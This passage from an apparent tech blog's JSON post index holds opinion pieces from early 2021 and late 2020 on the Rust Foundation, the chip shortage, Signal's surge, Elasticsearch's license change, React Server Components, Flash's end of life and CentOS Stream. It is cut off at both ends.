members represent genuine, broad investment in the language, and the governance structure seems thoughtfully designed. More importantly, the Rust community has a strong culture of open discussion and iterative improvement that should help course-correct if things go sideways.\nFor developers considering whether to invest in learning Rust: the foundation announcement reduces one of the biggest risks — the possibility that Rust could lose institutional support. With AWS, Google, Microsoft, and Huawei all committing resources, the language\u0026rsquo;s future looks more stable than ever.\nRust isn\u0026rsquo;t going to replace C or C++ overnight, and it doesn\u0026rsquo;t need to. What it offers is a modern alternative for new systems programming projects that prioritizes safety without sacrificing performance. The foundation gives that vision a more solid footing. I\u0026rsquo;ll be watching closely to see how the first year plays out.\n","date":"4 February 2021","externalUrl":null,"permalink":"/posts/210204-rust-foundation-systems-programming/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The newly formed Rust Foundation, backed by AWS, Google, Huawei, Microsoft, and Mozilla, gives Rust the institutional stability it needs for the next phase of growth.","title":"The Rust Foundation Is Here — What It Means for Systems Programming","type":"posts"},{"content":"This week, reports from multiple automotive manufacturers confirmed what many of us in the embedded and IoT space have been feeling for months: there simply aren\u0026rsquo;t enough chips to go around. Ford, Toyota, and Volkswagen have all announced production cuts due to semiconductor shortages, and the ripple effects are spreading far beyond cars. If you\u0026rsquo;re building anything that depends on microcontrollers, sensors, or custom silicon, you\u0026rsquo;re likely already feeling the squeeze — or you will soon.\nHow We Got Here # The current shortage has been building since mid-2020, driven by a perfect storm of factors. When COVID-19 hit, automotive manufacturers slashed their chip orders anticipating a prolonged slump. Meanwhile, demand for consumer electronics — laptops, gaming consoles, networking equipment — surged as the world shifted to remote work and entertainment. Chip fabricators, particularly TSMC and Samsung, reallocated capacity to serve the booming consumer and data center markets.\nNow that automotive demand has bounced back faster than expected, those manufacturers find themselves at the back of the queue. But this isn\u0026rsquo;t just a car problem. The shortage spans multiple process nodes and chip types. Reports from semiconductor industry analysts indicate lead times for some components have stretched to 26 weeks or more — double the normal timeframe.\nThe geographic concentration of fabrication capacity makes this worse. TSMC alone produces roughly 54% of the world\u0026rsquo;s contract-manufactured chips, and the vast majority of advanced node production (7nm and below) happens in Taiwan and South Korea. A single facility disruption — or a geopolitical incident — could turn a shortage into a crisis.\nWhat This Means for IoT and Embedded Development # For those of us building IoT systems, the implications are immediate and practical. Popular microcontrollers from STMicroelectronics, NXP, and even the ubiquitous ESP32 from Espressif are seeing extended lead times. I\u0026rsquo;ve been working on a sensor project that relies on an STM32L4 series chip, and my usual distributor is showing backorders stretching into Q3.\nThis forces some uncomfortable decisions. Do you redesign around a different MCU that happens to be available? Do you stockpile components, tying up capital and warehouse space? Do you delay product launches? None of these are great options, especially for smaller teams and startups that can\u0026rsquo;t throw purchasing power at the problem.\nThe Raspberry Pi Foundation has acknowledged supply constraints as well. While the Pi itself uses a Broadcom SoC that\u0026rsquo;s somewhat insulated from the broader shortage, the ecosystem of HATs, sensors, and peripheral components that make Pi projects useful is definitely affected.\nThe Deeper Structural Problem # What bothers me about this situation is that it exposes a vulnerability we\u0026rsquo;ve been ignoring for years. The global semiconductor supply chain is extraordinarily concentrated and optimized for efficiency, not resilience. Just-in-time manufacturing works beautifully until it doesn\u0026rsquo;t — and when it breaks, there\u0026rsquo;s no buffer.\nBuilding a new fabrication facility takes 2-3 years and costs $10-20 billion. You can\u0026rsquo;t spin up chip production the way you can spin up cloud instances. This physical reality means the current shortage will take time to resolve, regardless of how much money gets thrown at it. Intel\u0026rsquo;s new CEO, Pat Gelsinger (who just took the helm on January 13th), has signaled that revitalizing Intel\u0026rsquo;s foundry capabilities is a top priority. But even Intel\u0026rsquo;s manufacturing ambitions won\u0026rsquo;t produce chips tomorrow.\nThere\u0026rsquo;s also a design complexity angle worth noting. Modern chips are increasingly specialized — AI accelerators, 5G modems, automotive safety controllers — which means you can\u0026rsquo;t easily substitute one for another. The days when a shortage of one chip could be solved by swapping in a pin-compatible alternative are largely behind us.\nPractical Steps for Engineering Teams # If you\u0026rsquo;re leading a hardware or IoT project right now, here\u0026rsquo;s what I\u0026rsquo;d recommend based on what I\u0026rsquo;m seeing:\nDiversify your BOM. If your design is locked to a single-source component, start evaluating alternatives now. Even if you don\u0026rsquo;t need them today, having a validated second source could save your project in six months.\nExtend your planning horizon. If you normally order components 8-12 weeks out, push that to 20-26 weeks. Yes, this ties up more working capital, but it\u0026rsquo;s better than halting production.\nTalk to your distributors. The major distributors like Mouser, Digi-Key, and Farnell have allocation teams that can help prioritize orders if you have a relationship and can provide demand forecasts.\nConsider design flexibility. If you\u0026rsquo;re starting a new project, architecting for multiple MCU targets isn\u0026rsquo;t trivial, but frameworks like Zephyr RTOS and PlatformIO can make it more feasible to port between chipsets.\nMy Take # I\u0026rsquo;ve been building hardware-adjacent systems for long enough to have lived through previous semiconductor supply hiccups, but this one feels different in scale and duration. The combination of pandemic demand shifts, concentrated fabrication capacity, and increasing chip specialization creates a structural challenge that won\u0026rsquo;t be resolved quickly.\nThe silver lining, if there is one, is that this shortage is finally generating political will to diversify chip manufacturing. The US, EU, and Japan are all discussing incentives to build domestic fabrication capacity. Whether those plans materialize into actual fabs remains to be seen, but at least the conversation has moved from \u0026ldquo;interesting idea\u0026rdquo; to \u0026ldquo;national security priority.\u0026rdquo;\nFor now, order early, plan for delays, and keep your designs flexible. The chip shortage is the tech industry\u0026rsquo;s supply chain wake-up call — and we\u0026rsquo;d be wise to listen.\n","date":"28 January 2021","externalUrl":null,"permalink":"/posts/210128-global-chip-shortage-bottleneck/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The growing semiconductor shortage is disrupting everything from automotive to IoT devices, exposing fragile supply chains that the entire tech industry depends on.","title":"The Global Chip Shortage — Why Semiconductors Are the New Bottleneck","type":"posts"},{"content":"If you\u0026rsquo;ve been anywhere near tech Twitter this past week, you\u0026rsquo;ve seen the numbers: Signal went from a niche privacy tool to the number one app in app stores across multiple countries. The catalyst? WhatsApp\u0026rsquo;s updated privacy policy that requires users to share data with Facebook, or lose access to the platform. What seemed like a routine terms-of-service update has turned into a full-blown exodus — and it\u0026rsquo;s worth examining why this time feels different.\nThe Privacy Policy That Broke the Camel\u0026rsquo;s Back # Let\u0026rsquo;s be clear about what changed. WhatsApp\u0026rsquo;s new terms, announced on January 6th, require users to accept expanded data sharing with Facebook by February 8th. This includes phone numbers, transaction data, IP addresses, and various usage metrics. For users outside the EU (who are protected by GDPR), it\u0026rsquo;s essentially a take-it-or-leave-it proposition.\nNow, WhatsApp has been sharing some data with Facebook since 2016. But this update removes the opt-out that previously existed, making it mandatory. The timing is particularly tone-deaf — coming off a year where privacy concerns about big tech reached a fever pitch, and just weeks after Facebook faced antitrust lawsuits from the FTC and 48 state attorneys general. The broader pattern of privacy-compromising platform consolidation continues to fuel user distrust.\nThe response has been staggering. Signal reportedly saw millions of new installs in the days following the announcement. Telegram also benefited, claiming 25 million new users in just 72 hours. WhatsApp has since delayed the policy change to May 15th, but the damage to trust may already be done.\nWhy Signal Matters for the Open-Source Community # What makes Signal interesting from a technical perspective isn\u0026rsquo;t just that it\u0026rsquo;s private — it\u0026rsquo;s how it achieves that privacy. The Signal Protocol, which provides end-to-end encryption, is open source and has been independently audited. Ironically, WhatsApp itself uses the Signal Protocol for message encryption. The difference lies in metadata: while the message content may be encrypted, WhatsApp collects extensive metadata about who you talk to, when, how often, and from where.\nSignal, by contrast, is designed to minimize metadata collection. The organization has been transparent about this, even publishing the minimal data they were able to provide in response to a grand jury subpoena — essentially just the date an account was created and the last connection time.\nAs someone who\u0026rsquo;s spent decades working with open-source tools, I find Signal\u0026rsquo;s architecture refreshingly principled. The Signal Protocol is available on GitHub. The server code is open source. The cryptographic design has been peer-reviewed by researchers at institutions like Oxford and MIT. This is how security software should be built — in the open, subject to scrutiny, with no proprietary black boxes hiding data collection. This contrasts sharply with how privacy-critical systems should never be built in the shadows.\nThe Infrastructure Challenge # Of course, explosive growth brings engineering challenges. Signal experienced outages on January 15th as their infrastructure struggled to keep up with demand. For a small nonprofit going up against a platform with billions of users and Facebook\u0026rsquo;s engineering might, this is the real test.\nI\u0026rsquo;ve seen this pattern before in open-source projects that suddenly find mainstream adoption. The technology is often solid, but the operational side — scaling databases, provisioning servers, handling registration flows at 100x the normal rate — that\u0026rsquo;s where things get difficult. Signal uses a relatively straightforward server architecture, but no system is designed to handle this kind of growth overnight.\nThe good news is that Signal has some notable backers, including a $50 million loan from Brian Acton (WhatsApp\u0026rsquo;s co-founder, who left Facebook over — you guessed it — privacy disagreements). They\u0026rsquo;ve also been steadily improving their feature set, adding group calling, desktop support, and the kind of quality-of-life features that everyday users expect.\nThe Bigger Picture for Privacy-First Software # What\u0026rsquo;s happening with Signal represents something I\u0026rsquo;ve been hoping to see for years: mainstream users making active choices about privacy, not because of abstract principles, but because a specific company action crossed a line they could understand. \u0026ldquo;Share your data with Facebook or lose your messaging app\u0026rdquo; is a proposition clear enough to motivate action.\nThis matters for the broader software ecosystem. For too long, the assumption has been that users will tolerate any privacy trade-off in exchange for free services. The WhatsApp backlash suggests there\u0026rsquo;s a limit — and it creates space for privacy-respecting alternatives to gain traction in other categories too.\nMy Take # I switched to Signal years ago for sensitive conversations, and I\u0026rsquo;ve been gradually moving more of my communication there. What gives me optimism about this moment isn\u0026rsquo;t just the download numbers — it\u0026rsquo;s that people are actually having conversations about metadata, data sharing, and the real cost of \u0026ldquo;free\u0026rdquo; services. That\u0026rsquo;s a level of privacy literacy we badly need. The movement toward privacy-first tools and governance is one of the few encouraging trends in tech right now.\nThe real question is whether this translates into lasting change or whether it\u0026rsquo;s a momentary panic that fades once WhatsApp tweaks its messaging. History suggests most users eventually shrug and accept the new terms. But even if Signal retains only a fraction of its new users, it will have grown its base enormously — and proven that there\u0026rsquo;s genuine market demand for privacy-first communication tools.\nIf you haven\u0026rsquo;t tried Signal yet, now\u0026rsquo;s a good time. And if you\u0026rsquo;re building software, take note: users are paying attention to your privacy practices. That\u0026rsquo;s a trend I hope sticks around.\n","date":"21 January 2021","externalUrl":null,"permalink":"/posts/210121-signal-surge-whatsapp-privacy/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"WhatsApp’s updated privacy policy drives millions to Signal, highlighting the growing demand for privacy-respecting open-source alternatives.","title":"Signal's Explosive Growth — What WhatsApp's Privacy Blunder Means for Messaging","type":"posts"},{"content":"Elastic, the company behind Elasticsearch and Kibana, announced this week that they\u0026rsquo;re changing the license for both products from Apache 2.0 to a dual license under the Server Side Public License (SSPL) and the Elastic License. The move is directly aimed at Amazon Web Services, which offers Elasticsearch as a managed service (Amazon Elasticsearch Service) without contributing back to the project or paying Elastic for the privilege. This escalation in open-source licensing battles and the broader sustainability questions continue to shape how open-source projects balance community and commerce.\nThis is the latest escalation in an ongoing war between open-source companies and cloud providers, and it raises fundamental questions about the sustainability of open-source business models.\nThe Core Conflict # The tension is straightforward: Elastic creates Elasticsearch, invests millions in development, and open-sources it under a permissive license. AWS takes that code, wraps it in a managed service, and sells it to customers. AWS captures significant revenue from Elasticsearch without the development costs, while Elastic has to compete with its own product being sold by the world\u0026rsquo;s largest cloud provider.\nElastic CEO Shay Banon didn\u0026rsquo;t mince words in the announcement: \u0026ldquo;AWS and Amazon Elasticsearch Service. They have been doing things that we think are just NOT OK since 2015 and it has only gotten worse.\u0026rdquo;\nThis isn\u0026rsquo;t the first time we\u0026rsquo;ve seen this pattern. MongoDB moved to the SSPL in 2018 for similar reasons. Redis Labs changed licenses for certain modules. Cockroach Labs adopted the Business Source License. Each time, the motivation is the same: cloud providers are using permissive open-source licenses to build competing services without contributing to the projects they depend on. The developer community has responded directly when these dynamics become unsustainable, creating forks to reclaim open governance.\nWhat the SSPL Actually Means # The SSPL is based on the GNU AGPL but goes significantly further. The key provision: if you offer the software as a service, you must open-source the entire service stack — not just your modifications to the software, but all the management, orchestration, monitoring, and infrastructure code you use to deliver the service.\nThis is specifically designed to be impractical for cloud providers. AWS isn\u0026rsquo;t going to open-source its entire managed service infrastructure just to offer Elasticsearch. The SSPL effectively prevents cloud providers from offering the software as a service without a commercial agreement with Elastic.\nIt\u0026rsquo;s worth noting that the Open Source Initiative (OSI) does not consider the SSPL to be an open-source license. The SSPL\u0026rsquo;s requirements go beyond what the OSI\u0026rsquo;s Open Source Definition allows, which means Elasticsearch is, by the OSI\u0026rsquo;s definition, no longer open-source software. Elastic would argue that\u0026rsquo;s a technicality — the code is still publicly available, and the vast majority of users are unaffected by the license change. But definitions matter, and this distinction has real implications for organizations with open-source-only policies.\nThe AWS Perspective # It would be unfair not to acknowledge AWS\u0026rsquo;s position. Cloud providers argue that they\u0026rsquo;re doing exactly what open-source licenses allow — using and distributing software under the terms the creators chose. If Elastic didn\u0026rsquo;t want AWS to offer their software as a service, they shouldn\u0026rsquo;t have used the Apache 2.0 license.\nAWS has also pointed out that they do contribute to open-source projects and that the community benefits from the scale and accessibility that cloud services provide. Managed services lower the barrier to entry and bring more users to the ecosystem.\nThere\u0026rsquo;s some validity to this argument. I\u0026rsquo;ve seen plenty of organizations adopt Elasticsearch because they could get it as a managed AWS service without the operational overhead of running it themselves. Some of those organizations eventually became Elastic customers for premium features. The relationship between cloud services and open-source adoption isn\u0026rsquo;t purely extractive.\nThe Bigger Picture for Open Source # This license change is a symptom of a structural problem in the open-source ecosystem. The traditional model — build it open source, sell support and enterprise features — worked when the primary way to use software was to run it yourself. In the cloud era, the hyperscalers can offer a better operational experience than most vendors, and they have the scale to do it cheaply.\nI\u0026rsquo;ve been contributing to and using open-source software for most of my career, and I find this situation genuinely troubling. The open-source model has produced some of the most important software in history. But if the economics don\u0026rsquo;t work for the companies that invest in creating and maintaining that software, the model is at risk.\nSeveral approaches are being explored:\nSource-available licenses like the SSPL and BSL that restrict cloud provider usage while keeping the code public Open core models where the community edition is genuinely open source but premium features are proprietary Cloud-native licensing that specifically addresses the managed service use case Foundation-based governance where projects are maintained by a neutral foundation rather than a single company None of these are perfect. Source-available licenses fracture the open-source community. Open core can lead to artificial feature restrictions. Cloud-native licensing is legally untested. And foundation governance doesn\u0026rsquo;t solve the funding problem.\nWhat This Means for Users # If you\u0026rsquo;re using Elasticsearch in your organization, the practical impact depends on how you use it:\nSelf-hosted users: Virtually no impact. The SSPL only triggers if you\u0026rsquo;re offering Elasticsearch as a service to third parties. Running it internally for your own use is fine under both the SSPL and the Elastic License.\nAWS Elasticsearch Service users: The existing service isn\u0026rsquo;t going anywhere immediately, but Amazon may eventually need to fork the project or develop its own compatible implementation. There may be feature divergence over time.\nElastic Cloud users: No change — you\u0026rsquo;re already a paying Elastic customer.\nMy Take # I sympathize with Elastic\u0026rsquo;s position more than I\u0026rsquo;d like to. It genuinely is unfair for a cloud provider to take open-source software, offer it as a competing service, and capture most of the economic value. But I also think the SSPL is a flawed solution that creates confusion about what \u0026ldquo;open source\u0026rdquo; means and fragments the ecosystem.\nWhat I\u0026rsquo;d really like to see is the industry develop a new social contract around open source and cloud services. The cloud providers have built enormously profitable businesses on the back of open-source software, and they should be contributing back proportionally — whether through direct funding, meaningful code contributions, or licensing agreements. The tension between innovation speed and community governance reflects how critical open-source sustainability has become to the entire industry.\nUntil that happens, expect more license changes, more forks, and more tension. The open-source model that powered the last 25 years of software innovation needs an update for the cloud era. We just haven\u0026rsquo;t figured out what that update looks like yet.\nPart of the Developer Landscape series — because the code we write exists in an ecosystem shaped by business decisions.\n","date":"14 January 2021","externalUrl":null,"permalink":"/posts/210114-elasticsearch-license-change/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Elastic’s decision to move Elasticsearch and Kibana from Apache 2.0 to dual SSPL/Elastic License reignites the debate about open source sustainability in the cloud era.","title":"Elasticsearch Changes Its License — The Open Source vs. Cloud Provider Battle Heats Up","type":"posts"},{"content":"The React team ended 2020 with a bang: Dan Abramov and Lauren Tan presented React Server Components, a new experimental feature that allows React components to run exclusively on the server. The demo and accompanying RFC have sparked intense discussion across the JavaScript community, and after spending the holiday break digging into the details, I have some thoughts. This announcement comes as other frameworks like Angular were implementing their own modernization efforts with the Ivy compiler, showing an industry-wide push toward performance and developer experience improvements.\nThe core idea is simple: some components don\u0026rsquo;t need to be interactive. They just fetch data and render HTML. Why ship all that code — and all those dependencies — to the browser if the client never needs to execute it?\nHow Server Components Work # React Server Components introduce a new component type that executes only on the server. These components can directly access your database, file system, or internal APIs without exposing those capabilities or their dependencies to the client. The key innovation is that they integrate seamlessly with regular client-side React components in the same component tree.\nThe naming convention is straightforward: files ending in .server.js are Server Components, .client.js are Client Components, and plain .js files are shared. Server Components can render Client Components, but not vice versa (which makes sense — the server can produce markup that the client hydrates, but the client can\u0026rsquo;t execute server-only code).\nThe data fetching story is particularly compelling. Instead of the current pattern of useEffect → fetch → setState → re-render, or the more sophisticated solutions like React Query or SWR, Server Components can simply await data directly in the component body. No loading states, no waterfall fetches, no client-side caching complexity — the data is resolved on the server and streamed to the client as part of the rendered output.\nThe bundle size implications are significant. If a Server Component imports a heavy library — say, a Markdown parser or a date formatting library — that library never gets sent to the client. The demo showed an example where the notes app used a syntax highlighter and a date library, neither of which appeared in the client bundle. For applications that currently ship megabytes of JavaScript, this could be transformative.\nThe Good: Solving Real Problems # Let me be clear about what I think React Server Components get right.\nThe bundle size problem is real. Modern React applications ship an absurd amount of JavaScript to the browser. Bundle splitting and lazy loading help, but they add complexity and don\u0026rsquo;t solve the fundamental issue that many components exist only to fetch and display data. Server Components elegantly eliminate this category of unnecessary client-side code.\nData fetching in React has always been awkward. The component lifecycle doesn\u0026rsquo;t naturally align with data fetching patterns, and the community has produced dozens of solutions (Redux, MobX, React Query, SWR, Apollo, Relay) that each add their own complexity. Server Components offer a model where data fetching is just\u0026hellip; function calls. That\u0026rsquo;s refreshing.\nThe streaming architecture is smart. Server Components don\u0026rsquo;t return HTML — they return a serialized component tree that the client can merge with its existing state. This means the client can update parts of the UI from the server without losing client-side state like form inputs or scroll positions. It\u0026rsquo;s more sophisticated than traditional server-side rendering.\nThe Concerns: Complexity and Ecosystem Impact # That said, I have reservations.\nThe mental model is getting complicated. React developers now need to think about three types of components (Server, Client, Shared), understand serialization boundaries, know which hooks work where, and reason about a component tree that spans two execution environments. React\u0026rsquo;s original appeal was its simplicity — a component is a function that takes props and returns UI. We\u0026rsquo;re moving further from that simplicity with every new feature.\nThe ecosystem implications are enormous. Every React library, every component framework, every tutorial will need to be reconsidered in the context of Server Components. Which components should be server-only? Which libraries are \u0026ldquo;server-safe\u0026rdquo;? How do you test a component tree that spans client and server? The migration path for existing applications is unclear.\nIt tightens the coupling between frontend and backend. One of the benefits of the current SPA model is a clean separation between your API layer and your UI. Server Components blur this boundary by allowing components to directly access backend resources. For teams with separate frontend and backend developers, or organizations with microservice architectures, this coupling could be problematic.\nIt requires a compatible server runtime. You need a Node.js (or compatible) server that can execute React Server Components and stream results to the client. This moves React further from the \u0026ldquo;just drop a script tag in your HTML\u0026rdquo; simplicity and toward a full-stack framework requirement.\nComparison with Existing Approaches # It\u0026rsquo;s worth noting that server-rendered components aren\u0026rsquo;t a new idea. PHP, Ruby on Rails, and ASP.NET have been rendering HTML on the server for decades. More recently, frameworks like Next.js and Remix have brought server-side rendering back into the React ecosystem. The evolution of TypeScript has similarly enabled stronger type safety across the full stack, supporting both client and server-side development patterns.\nWhat makes React Server Components different is the granularity. Instead of rendering an entire page on the server and hydrating the whole thing on the client, you can mix server-rendered and client-rendered components at any level of your component tree. The server can render the data-heavy shell while the client handles the interactive widgets.\nThis is genuinely novel in the React ecosystem, and it could lead to applications that are both faster to load and more responsive to interact with — if the complexity can be managed.\nMy Take # I\u0026rsquo;ve been building web applications long enough to have lived through every paradigm shift — from server-rendered pages to AJAX to SPAs and now back toward the server. The pendulum swings, and each swing carries lessons from the previous one.\nReact Server Components feel like a necessary evolution. The current model of shipping entire applications as client-side JavaScript and then fetching all data through API calls has reached its limits. The bundle sizes are unsustainable, the loading waterfalls are painful, and the complexity of client-side state management has gotten out of hand. This pattern mirrors the larger industry shift we\u0026rsquo;ve seen with infrastructure-as-code and the recognition that full-stack thinking is necessary for modern applications.\nBut I worry about the execution. React is already a complex ecosystem, and Server Components add another dimension of complexity. The RFC is still experimental, and the final API could change significantly. My advice: understand the concepts, follow the development, but don\u0026rsquo;t rewrite your application yet.\nThe most exciting thing about Server Components might not be the feature itself, but what it signals about the direction of web development. The industry is collectively recognizing that we went too far with client-side-everything, and we\u0026rsquo;re finding smarter ways to leverage the server without going back to full page reloads. That\u0026rsquo;s progress.\nPart of the Developer Landscape series — tracking the shifts that shape how we build.\n","date":"7 January 2021","externalUrl":null,"permalink":"/posts/210107-react-server-components/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The React team’s introduction of Server Components promises zero-bundle-size components and direct backend access — but is it the right direction for frontend development?","title":"React Server Components — A Paradigm Shift or Just More Complexity?","type":"posts"},{"content":"Today, December 31, 2020, Adobe Flash Player officially reaches end of life. Adobe will stop distributing it, browsers have already removed or are removing support, and a technology that defined an entire era of the web will finally be laid to rest. After years of deprecation warnings and migration efforts, the plug is literally being pulled.\nI know Flash has been the punching bag of the web development community for the better part of a decade. But having worked through the era when Flash was genuinely revolutionary, I think it deserves a more nuanced farewell than most people are giving it.\nWhat Flash Actually Did for the Web # It\u0026rsquo;s easy to forget now, but in the late \u0026rsquo;90s and early 2000s, the web was boring. HTML 3.2 gave you tables, fonts, and not much else. JavaScript was a toy language that couldn\u0026rsquo;t reliably work across browsers. CSS was in its infancy. If you wanted rich interactivity, animation, audio, or video on the web, Flash was essentially your only option.\nFlash gave us YouTube before HTML5 video existed. It gave us web-based games, interactive learning platforms, and rich media experiences that simply weren\u0026rsquo;t possible with the native web stack. Entire categories of web applications — from video players to data visualization dashboards to interactive maps — were pioneered in Flash.\nMacromedia (later Adobe) Flash was also remarkably accessible to creators. The authoring environment combined a visual timeline editor with a progressively capable scripting language (ActionScript) that let designers create interactive content without being full-time programmers. It democratized rich media creation on the web in a way that nothing else did at the time.\nWhy It Had to Go # Of course, Flash had serious problems — and they only got worse as the web evolved.\nSecurity was perhaps the most damaging issue. Flash\u0026rsquo;s extensive capabilities meant an enormous attack surface, and Adobe struggled for years to keep up with the constant stream of zero-day vulnerabilities. For security-conscious organizations, Flash became a liability that was difficult to justify.\nPerformance was another persistent complaint. Flash content was notoriously CPU-hungry, drained laptop batteries, and could bring browsers to their knees. On mobile devices, the experience was even worse — which is partly what led to Steve Jobs\u0026rsquo; famous 2010 open letter \u0026ldquo;Thoughts on Flash\u0026rdquo;, declaring that iOS would never support it.\nProprietary control was the philosophical issue. Flash was a proprietary plugin owned by a single company, sitting as a black box inside the browser. Content inside Flash wasn\u0026rsquo;t indexable by search engines, wasn\u0026rsquo;t accessible to screen readers, and wasn\u0026rsquo;t part of the open web. As the web standards community gained momentum, this became increasingly untenable.\nThe rise of HTML5 ultimately made Flash unnecessary. The \u0026lt;video\u0026gt; and \u0026lt;audio\u0026gt; elements, Canvas, WebGL, CSS animations, and the maturation of JavaScript engines collectively replicated most of what Flash could do — natively, in the browser, without a plugin.\nThe Preservation Challenge # One thing that genuinely concerns me about Flash\u0026rsquo;s death is the preservation question. There\u0026rsquo;s an enormous body of creative work — games, animations, interactive art, educational content — that was built in Flash and is effectively going dark. The Internet Archive has been working to preserve Flash content using Ruffle, an open-source Flash emulator written in Rust, but the sheer volume of Flash content on the web means much of it will simply disappear.\nThis is a broader problem with proprietary formats and platforms. When the technology dies, the content dies with it. It\u0026rsquo;s a lesson worth remembering as we build increasingly complex web applications on today\u0026rsquo;s frameworks and platforms. What will happen to all our React apps in 20 years?\nLessons for Today\u0026rsquo;s Web Developers # Flash\u0026rsquo;s arc from revolution to revulsion teaches us a few things that are still relevant:\nOpen standards win in the long run. Proprietary technologies can move faster and deliver more impressive results in the short term, but open standards create a more resilient and interoperable ecosystem. The web standards process is slow and sometimes frustrating, but the result — a web that works everywhere, for everyone — is worth the wait.\nSecurity can\u0026rsquo;t be an afterthought. Flash\u0026rsquo;s security problems weren\u0026rsquo;t just bugs to be patched; they were architectural. The plugin model, with its broad system access and complex attack surface, was fundamentally difficult to secure. When you\u0026rsquo;re designing systems today, consider the security implications of your architectural choices, not just your implementation details.\nMobile changes everything. Flash\u0026rsquo;s inability to work well on mobile devices was a death sentence in a world that was rapidly going mobile-first. If your technology doesn\u0026rsquo;t work on the devices people actually use, it doesn\u0026rsquo;t matter how capable it is on the desktop.\nMy Take # I have a soft spot for Flash, and I\u0026rsquo;m not ashamed to admit it. I built some of my early interactive web projects with it, and there was a creative energy in the Flash community that I haven\u0026rsquo;t quite seen replicated since. Flash developers pushed the boundaries of what was possible on the web and, in doing so, helped define what the web needed to become.\nBut it was time. Flash\u0026rsquo;s security track record alone justified its retirement, and the modern web platform is genuinely more capable, more open, and more accessible than Flash ever was. The transition took longer than it should have — we\u0026rsquo;ve been talking about \u0026ldquo;killing Flash\u0026rdquo; since at least 2010 — but here we are.\nSo goodbye, Flash. Thanks for the games, the animations, the loading bars, and yes, even the security nightmares. The web you helped create has outgrown you, and that\u0026rsquo;s exactly as it should be.\nHappy New Year, everyone. Here\u0026rsquo;s to whatever the web becomes next.\n","date":"31 December 2020","externalUrl":null,"permalink":"/posts/201231-flash-end-of-life/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"As Adobe Flash reaches its official end of life on December 31, 2020, it’s worth reflecting on what it gave us and the lessons its rise and fall teach about web standards.","title":"Flash Is Finally Dead — Reflecting on a Technology That Shaped the Web","type":"posts"},{"content":"If you run production Linux servers — and statistically, you probably do — Red Hat just pulled the rug out from under a significant chunk of the ecosystem. Earlier this month, Red Hat announced that CentOS 8, which was supposed to be supported until 2029, will reach end-of-life at the end of 2021. Going forward, CentOS Stream will be the only CentOS — and it\u0026rsquo;s a fundamentally different product.\nFor those of us who\u0026rsquo;ve relied on CentOS as the free, stable, binary-compatible rebuild of Red Hat Enterprise Linux, this is a significant shift that deserves careful examination.\nWhat Changed and Why It Matters # CentOS has traditionally been a downstream rebuild of RHEL. Red Hat releases RHEL, and CentOS takes that source code and builds a free, community-supported version that\u0026rsquo;s essentially identical. It\u0026rsquo;s been the go-to choice for organizations that want RHEL compatibility without the subscription cost — from small startups to massive hosting providers.\nCentOS Stream, by contrast, is an upstream preview of RHEL. It sits between Fedora (the bleeding-edge community distro) and RHEL (the conservative enterprise release). Packages land in CentOS Stream before they go into RHEL, which means it\u0026rsquo;s a rolling preview of what RHEL will become, rather than a stable snapshot of what RHEL already is.\nThe practical difference is enormous. Classic CentOS was a known quantity — you could run it in production with confidence that it matched RHEL\u0026rsquo;s stability and patch cadence. CentOS Stream, while not unstable by any means, is a continuously evolving target. It\u0026rsquo;s closer to a development preview than a production platform.\nThe Community Response # The reaction has been swift and largely negative. The CentOS community has been vocal about feeling betrayed, and it\u0026rsquo;s not hard to see why. Organizations that chose CentOS 8 based on a 10-year support commitment are now facing a forced migration within a year.\nSeveral alternative projects have already emerged or announced their intentions:\nRocky Linux, announced by CentOS co-founder Gregory Kurtzer, aims to be a direct community-driven RHEL rebuild — essentially picking up where CentOS left off. CloudLinux has announced Project Lenix (now called AlmaLinux), another RHEL-compatible distribution backed by their commercial business. Both projects are in early stages, but the speed at which they\u0026rsquo;ve mobilized shows the depth of demand for a free RHEL rebuild and community-controlled alternatives to corporate-driven licensing changes.\nThe Business Logic # From Red Hat\u0026rsquo;s perspective, the move has a certain business logic. CentOS has long been a complicated asset for Red Hat. On one hand, it expanded the RHEL ecosystem and created a pipeline of users who might eventually become paying customers. On the other hand, it gave away essentially the same product for free, cannibalizing potential revenue.\nCentOS Stream serves Red Hat\u0026rsquo;s interests more directly: it creates a public testing ground for RHEL, gives the community a way to contribute to RHEL\u0026rsquo;s development, and removes the free production-ready alternative. If you want a stable, supported RHEL experience, you now need to pay for it.\nI understand the business reasoning, but I think it underestimates the goodwill that CentOS generated for the RHEL ecosystem. Many engineers learned Linux on CentOS, built their careers around it, and recommended RHEL to their employers precisely because they trusted the platform from their CentOS experience.\nPractical Migration Considerations # If you\u0026rsquo;re running CentOS 8 in production, you need to start planning now. Here\u0026rsquo;s my current thinking on the options:\nStay with CentOS Stream if your workloads are internal, you have solid testing pipelines, and you can tolerate the rolling update model. For development and staging environments, Stream is actually a decent choice.\nWait for Rocky Linux or AlmaLinux if you need strict RHEL binary compatibility for production workloads. Both projects look promising, but neither has shipped a stable release yet, so there\u0026rsquo;s inherent risk in committing to a project that hasn\u0026rsquo;t proven itself.\nMove to Ubuntu LTS if you\u0026rsquo;re not deeply invested in the RPM ecosystem and want a well-established alternative with long-term support. Canonical\u0026rsquo;s LTS model provides five years of standard support with optional extended security maintenance.\nConsider RHEL directly. Red Hat does offer free RHEL subscriptions for small production workloads and development use. The economics might work out better than you think, especially when you factor in the cost of maintaining your own CentOS alternative.\nEvaluate your cloud strategy. If you\u0026rsquo;re running in the cloud, consider whether you even need to care about the specific distro. Container-based workloads on managed Kubernetes, serverless functions, and platform services abstract away the OS layer entirely.\nMy Take # I\u0026rsquo;ve been running CentOS servers since the early days, and this decision genuinely stings. There was something reassuring about having a free, enterprise-grade Linux distribution that you could deploy anywhere with confidence. That era is ending.\nThat said, I think the Linux ecosystem will adapt. Rocky Linux and AlmaLinux will likely fill the gap, and the competition between them might actually result in something better than what we had before. Open source has a way of routing around obstacles.\nWhat concerns me more is the precedent. Red Hat is owned by IBM now, and this decision feels like the kind of move a large corporation makes when it prioritizes revenue capture over community goodwill. I hope this doesn\u0026rsquo;t signal a broader shift in how Red Hat engages with the open-source community, but I\u0026rsquo;m watching carefully.\nFor now, my advice is pragmatic: don\u0026rsquo;t panic, but don\u0026rsquo;t ignore this either. Start evaluating your options, test alternatives, and have a migration plan ready. The end of 2021 will come faster than you 